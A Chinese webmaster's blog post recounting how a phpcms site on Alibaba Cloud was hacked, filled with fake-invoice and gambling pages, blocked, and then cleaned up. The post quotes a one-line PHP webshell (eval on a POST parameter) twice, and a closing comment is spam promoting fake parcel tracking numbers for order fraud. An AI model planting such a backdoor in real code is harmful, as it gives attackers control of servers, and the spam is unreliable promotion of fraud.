首页 网站运营正文

一句话木马,?php var_dump(md5(123));$content=stripslashes(

一句话木马,<?php var_dump(md5(123));$content=stripslashes($_POST[1]);eval($content);  网站下有个文件,里面的内容是这个。原来我的网站被黑了。


都说阿里云服务器特别的稳定,价格还实惠,多年续费还打8折,心动已久。2017年初正式把网站迁移到阿里云服务器上,备好案,一切正常运行,网站访问速度比之前的西部数码真的是快了好多倍啊,不愧是马云家的东西。3月15日上午,手机突然收到了阿里云的短信,提示我网站涉及违法不良信息被阿里云屏蔽访问处理。脑子顿时有点蒙圈,赶紧打开网站看一看,网站已经无法访问了,心情糟糕透了。QQ邮箱也收到了阿里云的提示邮件,《违规URL屏蔽访问处理通知》,如下图所示:

尊敬的用户:您的网站URL:http://www.hifi.com.cn/content-80-3006-1.html涉及违法不良信息,违反了相关服务协议和《互联网信息服务管理办法》第十五条规定,目前阿里云已对您的违法URL做屏蔽访问处理。如果您对本通知的内容存有疑问,请及时工单或者电话联系我们, 谢谢您对阿里云的支持。查看您网站涉及违禁商品类 -> 证件卡票风险类型:违禁商品类-证件卡票1、您需要将您的网站违法文件,违法页面进行彻底整改删除。(包括但不限于我们通知的内容)2、需要您在公安备案平台 http://www.beian.gov.cn 申请公安备案,截图并工单反馈申请开通。特别注意:第一次(7天累计违规网页达100条) 阻断域名完全整改、公安平台提交网站备案、参加网站安全管理考试及培训。第二次7天累计超过100条,我们会再次关停您的网站,并取消您的帐号参加阿里云平台全年营销活动的资格,阻断域名且1年内禁止参加阿里云平台营销活动。第三次我们将永久关停您的网站不再提供解锁申请,并且您的帐号取消购买资格,后期将无法再在阿里云平台进行任何产品购买。打开阿里云所说的链接地址:http://www.hifi.com.cn/content-80-3006-1.html网站提示:该内容被禁止访问

看了阿里云的通知,我才意识到问题的严重性,在7天内不及时处理,网站就可能永久的被封了,停止访问了,我续了3年的服务器啊。大体了解了为什么阿里云会屏蔽 访问处理我的网站,从头到尾我把问题的解决过程记录到我的日志里,希望能帮到更多遇到同样情况的站长们。 第一步:首先看一下网站的百度的收录情况。

百度里site:网站,看到网站收录都是一些代开发票的信息,还有一些博彩类的恶意内容。点击快照,竟然直接给跳转到别人的网站上去了,我这才意识到原来是我网站被黑了,网站的程序代码都被黑客篡改了,赶紧登陆服务器检查程序代码。content-80-3006-1.html 这个文件也存在于网站跟目录下,打开一看确实都是一些代开发票,博彩的内容。又发现网站的根目录下多了一个php文件,名字也起的好特别。

里面竟然还有什么蜡笔小新,下面的代码都是加了密的,具体的内容没有看到,应该是黑客的木马文件,我随即删除了这个文件,又在其他文件夹下查到了一句话木马代码。<?php var_dump(md5(123));$content=stripslashes($_POST[1]);eval($content);这个木马的作用是POST提交,可以直接上传任意文件到网站目录下,并控制网站的权限。在目录下还查到有一个TXT文件,里面竟然是代开发票的内容,终于找到问题的根本了。

把以上发现的木马文件都删除后,在阿里云工单里,提交了工单,抓紧让阿里云技术检查一下,还有没有了,大约1个小时内技术回复我的工单了,暂时已经解除网站屏蔽,网站现已正常访问了。至此,关于阿里云阻断域名,屏蔽处理我网站的问题,彻底的得以解决,从头到尾又反思了一下整个问题的根本,为什么黑客会黑了我的网站,而且还上传了木马文件,这问题的本质应该是我的网站是有漏洞,才会被黑客攻击。按照这个思路,网站用的是phpcms系统,百度搜索了下phpcms 漏洞,发现phpcms最近爆出了高危漏洞,SQL注入获取管理员密码的漏洞,原来是程序确实有漏洞了,看了大牛们文章修复方案,本身我是搞程序设计的,自己根据修复方案,修复了网站的漏洞。程序代码上的漏洞,需要有安全意识,懂程序代码的程序员才能修复的了,如果自己不懂程序代码,也可以找一些安全公司来解决,国内网站安全方面,也就Sinesafe和绿盟等等安全公司比较专业


评论

精彩评论
  • 2020-02-21 11:00:42

    买空包、淘宝快递单号购买、拼多多快递单号购买上忧忧单号网www.uudanhaowang.com